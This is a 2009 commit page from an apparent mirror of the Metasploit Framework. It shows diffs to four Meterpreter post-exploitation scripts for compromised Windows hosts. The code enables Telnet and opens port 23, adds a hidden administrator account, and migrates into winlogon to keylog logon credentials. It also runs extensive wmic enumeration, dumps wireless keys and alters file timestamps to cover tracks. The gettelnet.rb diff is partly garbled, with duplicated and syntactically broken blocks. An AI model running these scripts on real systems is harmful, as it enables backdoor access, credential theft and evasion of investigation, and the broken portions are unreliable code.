infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Updated meterpreter scripts from Carlos Perez 

git-svn-id: file:///home/svn/framework3/trunk@6386 4d416f70-5f16-0410-b530-b9f4589650da
unstable
natron 2009-03-25 03:13:54 +00:00
parent 73e946ccf1
commit 02ab203dfd
4 changed files with 325 additions and 218 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

397
scripts/meterpreter/gettelnet.rb
View File

@ -1,201 +1,212 @@
#!/usr/bin/env ruby
#
#Meterpreter script for enabling Telnet Server on Windows 2003, Windows Vista
#Windows 2008 and Windows XP targets using native windows commands.
#Provided by Carlos Perez at carlos_perez[at]darkoperator.com
#Verion: 0.1.1
#!/usr/bin/env ruby
#
#Meterpreter script for enabling Telnet Server on Windows 2003, Windows Vista
#Windows 2008 and Windows XP targets using native windows commands.
#Provided by Carlos Perez at carlos_perez[at]darkoperator.com
#Verion: 0.1.2
#Note: If the Telnet Server is not installed in Vista or win2k8
# it will be installed.
################## Variable Declarations ##################
session = client
@@exec_opts = Rex::Parser::Arguments.new(
"-h" => [ false, "Help menu." ],
"-e" => [ false, "Enable Telnet Server only." ],
"-p" => [ true, "The Password of the user to add." ],
"-u" => [ true, "The Username of the user to add." ]
)
def checkifinst(session)
r = session.sys.process.execute("sc query state= all",nil, {'Hidden' => true, 'Channelized' => true})
while(d = r.channel.read)
if d =~ (/TlntSvr/)
return true
end
end
r.channel.close
r.close
end
#-------------------------------------------------------------------------------
def winver(session)
stringtest = ""
verout = []
r = session.sys.process.execute("cmd.exe /c ver", nil, {'Hidden' => 'true','Channelized' => true})
while(d = r.channel.read)
stringtest << d
end
r.channel.close
r.close
verout, minor, major = stringtest.scan(/(\d)\.(\d)\.(\d*)/)
version = nil
if verout[0] == "6"
if verout[1] == "0"
version = "Windows Vista/Windows 2008"
elsif verout[1] == "1"
version = "Windpows 7"
end
elsif verout [0] == "5"
if verout[1] == "0"
version = "Windows 2000"
elsif verout[1] == "1"
version = "Windows XP"
elsif verout[1] == "2"
version = "Windows 2003"
end
end
version
end
#---------------------------------------------------------------------------------------------------------
def insttlntsrv(session)
trgtos = winver(session)
# it will be installed.
################## Variable Declarations ##################
session = client
@@exec_opts = Rex::Parser::Arguments.new(
"-h" => [ false, "Help menu." ],
"-e" => [ false, "Enable Telnet Server only." ],
"-p" => [ true, "The Password of the user to add." ],
"-u" => [ true, "The Username of the user to add." ]
)
def checkifinst(session)
r = session.sys.process.execute("sc query state= all",nil, {'Hidden' => true, 'Channelized' => true})
while(d = r.channel.read)
if d =~ (/TlntSvr/)
return true
end
end
r.channel.close
r.close
end
#-------------------------------------------------------------------------------
def winver(session)
stringtest = ""
verout = []
r = session.sys.process.execute("cmd.exe /c ver", nil, {'Hidden' => 'true','Channelized' => true})
while(d = r.channel.read)
stringtest << d
end
r.channel.close
r.close
verout, minor, major = stringtest.scan(/(\d)\.(\d)\.(\d*)/)
version = nil
if verout[0] == "6"
if verout[1] == "0"
version = "Windows Vista/Windows 2008"
elsif verout[1] == "1"
version = "Windpows 7"
end
elsif verout [0] == "5"
if verout[1] == "0"
version = "Windows 2000"
elsif verout[1] == "1"
version = "Windows XP"
elsif verout[1] == "2"
version = "Windows 2003"
end
end
version
end
#---------------------------------------------------------------------------------------------------------
def insttlntsrv(session)
trgtos = winver(session)
if trgtos =~ /(Windows Vista)/
if checkifinst(session)
print_status("Telnet Service Installed on Target")
else
print_status("Installing Telnet Server Service ......")
session.response_timeout=90
r = session.sys.process.execute("pkgmgr /iu:\"TelnetServer\"",nil, {'Hidden' => true, 'Channelized' => true})
while(d = r.channel.read)
tmpout << d
end
r.channel.close
r.close
else
print "[*] Installing Telnet Server Service ......")
session.response_timeout=90
r = session.sys.process.execute("pkgmgr /iu:\"TelnetServer\"",nil, {'Hidden' => true, 'Channelized' => true})
sleep(2)
prog2check = "pkgmgr.exe"
found = 0
while found == 0
session.sys.process.get_processes().each do |x|
found =1
if prog2check == (x['name'].downcase)
print "."
sleep(0.5)
found = 0
end
end
end
end
end
#---------------------------------------------------------------------------------------------------------
def enabletlntsrv(session)
tmpout = [ ]
cmdout = []
key2 = "HKLM\\SYSTEM\\CurrentControlSet\\Services\\TlntSvr"
root_key2, base_key2 = session.sys.registry.splitkey(key2)
value2 = "Start"
begin
open_key = session.sys.registry.open_key(root_key2, base_key2, KEY_READ)
v2 = open_key.query_value(value2)
print_status "Setting Telnet Server Services service startup mode"
if v2.data != 2
print_status "\tThe Telnet Server Services service is not set to auto, changing it to auto ..."
cmmds = [ 'sc config TlntSvr start= auto', "sc start TlntSvr", ]
cmmds. each do |cmd|
r = session.sys.process.execute(cmd, nil, {'Hidden' => true, 'Channelized' => true})
while(d = r.channel.read)
tmpout << d
end
cmdout << tmpout
r.channel.close
r.close
end
else
print_status "\tTelnet Server Services service is already set to auto"
end
#Enabling Exception on the Firewall
print_status "\tOpening port in local firewall if necessary"
r = session.sys.process.execute('netsh firewall set portopening protocol = tcp port = 23 mode = enable', nil, {'Hidden' => true, 'Channelized' => true})
while(d = r.channel.read)
tmpout << d
end
cmdout << tmpout
r.channel.close
r.close
rescue::Exception => e
print_status("The following Error was encountered: #{e.class} #{e}")
end
end
#---------------------------------------------------------------------------------------------------------
def addrdpusr(session, username, password)
tmpout = [ ]
cmdout = []
print_status "Setting user account for logon"
print_status "\tAdding User: #{username} with Password: #{password}"
begin
r = session.sys.process.execute("net user #{username} #{password} /add", nil, {'Hidden' => true, 'Channelized' => true})
while(d = r.channel.read)
tmpout << d
end
cmdout << tmpout
r.channel.close
r.close
print_status "\tAdding User: #{username} to local group TelnetClients"
r = session.sys.process.execute("net localgroup \"TelnetClients\" #{username} /add", nil, {'Hidden' => true, 'Channelized' => true})
while(d = r.channel.read)
tmpout << d
end
cmdout << tmpout
r.channel.close
r.close
print_status "\tAdding User: #{username} to local group Administrators"
r = session.sys.process.execute("net localgroup Administrators #{username} /add", nil, {'Hidden' => true, 'Channelized' => true})
while(d = r.channel.read)
tmpout << d
end
cmdout << tmpout
r.channel.close
r.close
print_status "You can now login with the created user"
rescue::Exception => e
print_status("The following Error was encountered: #{e.class} #{e}")
end
end
#---------------------------------------------------------------------------------------------------------
def message
print_status "Windows Telnet Server Enabler Meterpreter Script"
r.channel.close
r.close
print_status("Finnished installing the Telnet Service.")
end
end
end
#---------------------------------------------------------------------------------------------------------
def enabletlntsrv(session)
tmpout = [ ]
cmdout = []
key2 = "HKLM\\SYSTEM\\CurrentControlSet\\Services\\TlntSvr"
root_key2, base_key2 = session.sys.registry.splitkey(key2)
value2 = "Start"
begin
open_key = session.sys.registry.open_key(root_key2, base_key2, KEY_READ)
v2 = open_key.query_value(value2)
print_status "Setting Telnet Server Services service startup mode"
if v2.data != 2
print_status "\tThe Telnet Server Services service is not set to auto, changing it to auto ..."
cmmds = [ 'sc config TlntSvr start= auto', "sc start TlntSvr", ]
cmmds. each do |cmd|
r = session.sys.process.execute(cmd, nil, {'Hidden' => true, 'Channelized' => true})
while(d = r.channel.read)
tmpout << d
end
cmdout << tmpout
r.channel.close
r.close
end
else
print_status "\tTelnet Server Services service is already set to auto"
end
#Enabling Exception on the Firewall
print_status "\tOpening port in local firewall if necessary"
r = session.sys.process.execute('netsh firewall set portopening protocol = tcp port = 23 mode = enable', nil, {'Hidden' => true, 'Channelized' => true})
while(d = r.channel.read)
tmpout << d
end
cmdout << tmpout
r.channel.close
r.close
rescue::Exception => e
print_status("The following Error was encountered: #{e.class} #{e}")
end
end
#---------------------------------------------------------------------------------------------------------
def addrdpusr(session, username, password)
tmpout = [ ]
cmdout = []
print_status "Setting user account for logon"
print_status "\tAdding User: #{username} with Password: #{password}"
begin
r = session.sys.process.execute("net user #{username} #{password} /add", nil, {'Hidden' => true, 'Channelized' => true})
while(d = r.channel.read)
tmpout << d
end
cmdout << tmpout
r.channel.close
r.close
print_status "\tAdding User: #{username} to local group TelnetClients"
r = session.sys.process.execute("net localgroup \"TelnetClients\" #{username} /add", nil, {'Hidden' => true, 'Channelized' => true})
while(d = r.channel.read)
tmpout << d
end
cmdout << tmpout
r.channel.close
r.close
print_status "\tAdding User: #{username} to local group Administrators"
r = session.sys.process.execute("net localgroup Administrators #{username} /add", nil, {'Hidden' => true, 'Channelized' => true})
while(d = r.channel.read)
tmpout << d
end
cmdout << tmpout
r.channel.close
r.close
print_status "You can now login with the created user"
rescue::Exception => e
print_status("The following Error was encountered: #{e.class} #{e}")
end
end
#---------------------------------------------------------------------------------------------------------
def message
print_status "Windows Telnet Server Enabler Meterpreter Script"
end
def usage
print(
"Windows Telnet Server Enabler Meterpreter Script\n" +
"Usage: getgui -u <username> -p <password> \n" +
@@exec_opts.usage
print(
"Windows Telnet Server Enabler Meterpreter Script\n" +
"Usage: getgui -u <username> -p <password> \n" +
@@exec_opts.usage
)
end
################## MAIN ##################
# Parsing of Options
usr = nil
pass = nil
lport = nil
enbl = nil
@@exec_opts.parse(args) { |opt, idx, val|
case opt
when "-u"
usr = val
when "-p"
pass = val
when "-h"
usage
break
when "-n"
lport = val.to_i
when "-e"
enbl = 1
end
}
if enbl == 1
message
insttlntsrv(session)
enabletlntsrv(session)
elsif usr!= nil && pass != nil
message
insttlntsrv(session)
enabletlntsrv(session)
addrdpusr(session, usr, pass)
else
usage
end
end
################## MAIN ##################
# Parsing of Options
usr = nil
pass = nil
lport = nil
enbl = nil
@@exec_opts.parse(args) { |opt, idx, val|
case opt
when "-u"
usr = val
when "-p"
pass = val
when "-h"
usage
break
when "-n"
lport = val.to_i
when "-e"
enbl = 1
end
}
if enbl == 1
message
insttlntsrv(session)
enabletlntsrv(session)
elsif usr!= nil && pass != nil
message
insttlntsrv(session)
enabletlntsrv(session)
addrdpusr(session, usr, pass)
else
usage
end

24
scripts/meterpreter/keylogrecorder.rb
View File

@ -34,21 +34,15 @@ captype = 0
"-c" => [ true, "Type of key capture. (0) for user key presses or (1) for winlogon credential capture Default is 0."]
)
#Function to Migrate in to Explorer process to be able to interact with desktop
def explrmigrate(session,captype)
def explrmigrate(session,captype,adm)
begin
print_status("Migrating process...")
if captype.to_i == 0
process2mig = "explorer.exe"
elsif captype.to_i == 1
# Check to make sure that process is running and system to be able to migrate to high priv process
if (session.sys.config.getuid == "NT AUTHORITY\\SYSTEM")
process2mig = "winlogon.exe"
else
print_status("\tYou are not currently running as System to be able to migrate to winlogon.")
print_status("\tCapturing only logon user keystrokes.")
process2mig = "explorer.exe"
end
process2mig = "winlogon.exe"
else
process2mig = "explorer.exe"
end
@ -70,8 +64,10 @@ end
#Function for starting the keylogger
def startkeylogger(session)
begin
print_status("Grabbing Desktop Keyboard Input...")
session.ui.grab_desktop
print_status("Starting the keystroke sniffer...")
client.ui.keyscan_start
session.ui.keyscan_start
return true
rescue
print_status("Failed to start Keylogging!")
@ -125,8 +121,11 @@ def keycap(session, keytime, logfile)
end
db.close
rescue::Exception => e
print("\n")
print_status("#{e.class} #{e}")
db.close
print_status("Error: #{e.class} #{e}")
print_status("Stopping keystroke sniffer...")
session.ui.keyscan_stop
end
end
def helpmsg
@ -155,7 +154,8 @@ helpcall = 0
}
if helpcall == 0
if explrmigrate(session,captype)
adm = checkifadm(session)
if explrmigrate(session,captype,adm)
if startkeylogger(session)
keycap(session, keytime, logfile)
end

40
scripts/meterpreter/remotewinenum.rb
View File

@ -3,7 +3,7 @@
#Meterpreter script for basic enumeration of Windows 2003, Windows Vista
# and Windows XP remote targets using native windows command wmic.
#Provided by Carlos Perez at carlos_perez[at]darkoperator.com
#Verion: 0.1.1
#Verion: 0.1.0
#Note:
################## Variable Declarations ##################
session = client
@ -39,10 +39,17 @@ wmic = [
'group list',
'sysaccount list',
'volume list brief',
'logicaldisk get description,filesystem,name,size',
'netlogin get name,lastlogon,badpasswordcount',
'netclient list brief',
'netuse get name,username,connectiontype,localname',
'share get name,path',
'nteventlog get path,filename,writeable',
'service list brief',
'process list brief',
'startup list full',
'rdtoggle list',
'product get name,version',
'qfe list'
]
################## Function Declarations ##################
@ -75,7 +82,19 @@ def wmicexec(session,wmic,user,pass,trgt)
sleep(1)
#print_status "\twmic #{command}"
r = session.sys.process.execute("cmd.exe /c wmic #{command}", nil, {'Hidden' => true})
sleep(2)
#Making sure that wmic finnishes before executing next wmic command
prog2check = "wmic.exe"
found = 0
sleep(2)
while found == 0
session.sys.process.get_processes().each do |x|
found =1
if prog2check == (x['name'].downcase)
sleep(0.5)
found = 0
end
end
end
r.close
end
# Read the output file of the wmic commands
@ -122,6 +141,9 @@ end
def winver(session)
stringtest = ""
verout = []
tmp = session.fs.file.expand_path("%TEMP%")
wmitmptxt = tmp + "\\" + sprintf("%.5d",rand(100000))
r = session.sys.process.execute("cmd.exe /c ver", nil, {'Hidden' => 'true','Channelized' => true})
while(d = r.channel.read)
stringtest << d
@ -133,7 +155,19 @@ def winver(session)
version = nil
if verout[0] == "6"
if verout[1] == "0"
version = "Windows Vista/Windows 2008"
r = session.sys.process.execute("cmd.exe /c wmic /append:#{wmitmptxt} os get name", nil, {'Hidden' => true})
sleep(2)
# Read the output file of the wmic commands
r = session.sys.process.execute("cmd.exe /c type #{wmitmptxt}", nil, {'Hidden' => 'true','Channelized' => true})
while(d = r.channel.read)
if d =~ /Windows Serverr 2008/
version = "Windows 2008"
elsif d =~ /Windows Vista/
version = "Windows Vista"
end
end
r.channel.close
r.close
elsif verout[1] == "1"
version = "Windpows 7"
end

82
scripts/meterpreter/winenum.rb
View File

@ -1,20 +1,21 @@
#!/usr/bin/env ruby
#
#Meterpreter script for basic enumeration of Windows 2000, Windows 2003, Windows Vista
# and Windows XP targets using native windows commands.
#Windows 7 and Windows XP targets using native windows commands.
#Provided by Carlos Perez at carlos_perez[at]darkoperator.com
#Verion: 0.3.4
#Verion: 0.3.5
#Note: Compleatly re-writen to make it modular and better error handling.
# Working on adding more Virtual Machine Checks and looking at improving
# the code but retain the independance of each module so it is easier for
# the code to be re-used.
#Contributor: natron (natron 0x40 invisibledenizen 0x2E com) (Process Migration Functions)
# inquis (bernardo.damele 0x40 gmail 0x2E com) (Minor Fixes)
################## Variable Declarations ##################
session = client
host,port = session.tunnel_peer.split(':')
# Create Filename info to be appended to downloaded files
filenameinfo = "_" + ::Time.now.strftime("%Y%m%d.%M%S")+sprintf("%.5d",rand(100000))
filenameinfo = "_" + ::Time.now.strftime("%Y%m%d.%M%S")+"-"+sprintf("%.5d",rand(100000))
# Create a directory for the logs
logs = ::File.join(Msf::Config.config_directory, 'logs', 'winenum', host + filenameinfo )
@ -47,8 +48,12 @@ commands = [
'net group administrators',
'net view /domain',
'netsh firewall show config',
'tasklist /svc'
'tasklist /svc',
'tasklist /m'
]
# Windows 2008 Commands
win2k8cmd = [
'oclist',
]
# Commands wich MACE will be changed
cmdstomp = [
@ -65,14 +70,21 @@ cmdstomp = [
]
# WMIC Commands that will be executed on the Target
wmic = [
'computersystem list',
'computersystem list brief',
'useraccount list',
'group list',
'service list brief',
'volume list brief',
'logicaldisk get description,filesystem,name,size',
'netlogin get name,lastlogon,badpasswordcount',
'netclient list brief',
'netuse get name,username,connectiontype,localname',
'share get name,path',
'nteventlog get path,filename,writeable',
'process list brief',
'startup list full',
'rdtoggle list',
'product get name,version',
'qfe',
]
#Specific Commands for Windows vista for Wireless Enumeration
@ -184,7 +196,7 @@ def wmicexec(session,wmiccmds= nil)
tmp = session.fs.file.expand_path("%TEMP%")
wmicfl = tmp + "\\wmictmp.txt"
wmiccmds.each do |wmi|
print_status "\trunning command wimic #{wmi}"
print_status "\trunning command wmic #{wmi}"
r = session.sys.process.execute("cmd.exe /c echo ***************************************** >> #{wmicfl}",nil, {'Hidden' => 'true'})
sleep(1)
r = session.sys.process.execute("cmd.exe /c echo Output of wmic #{wmi} >> #{wmicfl}",nil, {'Hidden' => 'true'})
@ -193,6 +205,18 @@ def wmicexec(session,wmiccmds= nil)
sleep(1)
r = session.sys.process.execute("cmd.exe /c wmic /append:#{wmicfl} #{wmi}", nil, {'Hidden' => true})
sleep(2)
#Making sure that wmic finnishes before executing next wmic command
prog2check = "wmic.exe"
found = 0
while found == 0
session.sys.process.get_processes().each do |x|
found =1
if prog2check == (x['name'].downcase)
sleep(0.5)
found = 0
end
end
end
r.close
end
# Read the output file of the wmic commands
@ -364,6 +388,22 @@ def regdump(session,pathoflogs,filename)
session.sys.process.execute("cmd.exe /c del #{windir}\\Temp\\HK*", nil, {'Hidden' => 'true'})
end
#-------------------------------------------------------------------------------
# Function for extracting program list from registry
def findprogs(session)
print_status("Extracting software list from registry")
proglist = ""
session.sys.registry.create_key(HKEY_CURRENT_USER, 'Software').each_key() do |company|
proglist << "#{company}"
session.sys.registry.create_key(HKEY_CURRENT_USER, "Software\\#{company}").each_key() do |software|
proglist << "\t#{software}"
end
end
print_status("Finnished Extraction of software list from registry")
proglist
end
#-------------------------------------------------------------------------------
# Function that will call 2 other Functions to cover all tracks
def covertracks(session,cmdstomp)
@ -504,6 +544,9 @@ end
def winver(session)
stringtest = ""
verout = []
tmp = session.fs.file.expand_path("%TEMP%")
wmitmptxt = tmp + "\\" + sprintf("%.5d",rand(100000))
r = session.sys.process.execute("cmd.exe /c ver", nil, {'Hidden' => 'true','Channelized' => true})
while(d = r.channel.read)
stringtest << d
@ -515,9 +558,21 @@ def winver(session)
version = nil
if verout[0] == "6"
if verout[1] == "0"
version = "Windows Vista/Windows 2008"
r = session.sys.process.execute("cmd.exe /c wmic /append:#{wmitmptxt} os get name", nil, {'Hidden' => true})
sleep(2)
# Read the output file of the wmic commands
r = session.sys.process.execute("cmd.exe /c type #{wmitmptxt}", nil, {'Hidden' => 'true','Channelized' => true})
while(d = r.channel.read)
if d =~ /Windows Serverr 2008/
version = "Windows 2008"
elsif d =~ /Windows Vista/
version = "Windows Vista"
end
end
r.channel.close
r.close
elsif verout[1] == "1"
version = "Windpows 7"
version = "Windows 7"
end
elsif verout [0] == "5"
if verout[1] == "0"
@ -588,13 +643,20 @@ if helpopt != 1
if trgtos =~ /(Windows XP)/
filewrt(dest,list_exec(session,commands))
filewrt(dest,wmicexec(session,wmic))
filewrt(dest,findprogs(session))
dumpwlankeys(session,logs,filenameinfo)
elsif trgtos =~ /(Windows .NET Server)/
elsif trgtos =~ /(Windows 2003)/
filewrt(dest,list_exec(session,commands))
filewrt(dest,wmicexec(session,wmic))
filewrt(dest,findprogs(session))
elsif trgtos =~ /(Windows Vista)/
filewrt(dest,list_exec(session,commands + vstwlancmd))
filewrt(dest,wmicexec(session,wmic))
filewrt(dest,findprogs(session))
elsif trgtos =~ /(Windows 7)/
filewrt(dest,list_exec(session,commands + vstwlancmd))
filewrt(dest,wmicexec(session,wmic))
dumpwlankeys(session,logs,filenameinfo)
dumpwlankeys(session,logs,filenameinfo)
elsif trgtos =~ /(Windows 2000)/
filewrt(dest,list_exec(session,commands - nonwin2kcmd))